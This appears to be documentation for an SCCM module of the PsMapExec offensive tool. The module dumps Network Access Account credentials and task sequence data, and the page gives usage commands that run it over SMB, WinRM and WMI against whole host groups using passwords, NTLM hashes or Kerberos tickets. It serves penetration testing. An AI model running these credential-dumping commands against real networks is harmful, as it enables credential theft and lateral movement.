SCCM

Dumps local SCCM secrets for Network Access Account credentials and task sequence data. Collected information is automatically parsed, organized, and stored in $PWD\PME\SCCM\.

Uses a stripped-down and revised version of SharpSCCM for execution.

Supported Methods

  • SMB
  • SessionHunter
  • WMI
  • WinRM

Optional Parameters

Parameter      Value   Description
-NoParse       N/A     Omits parsing of output from each system.
-ShowOutput    N/A     Displays each target's output to the console.
-SuccessOnly   N/A     Displays only successful results.

Usage Examples

# SMB execution with password authentication, targeting workstations
PsMapExec SMB -Targets "Workstations" -Username [User] -Password [Pass] -Module SCCM

# WinRM execution with hash authentication, targeting servers
PsMapExec WinRM -Targets "Servers" -Username [User] -Hash [Hash] -Module SCCM

# WMI execution with Kerberos ticket authentication (Username not required)
PsMapExec WMI -Targets "All" -Ticket [doI..] -Module SCCM
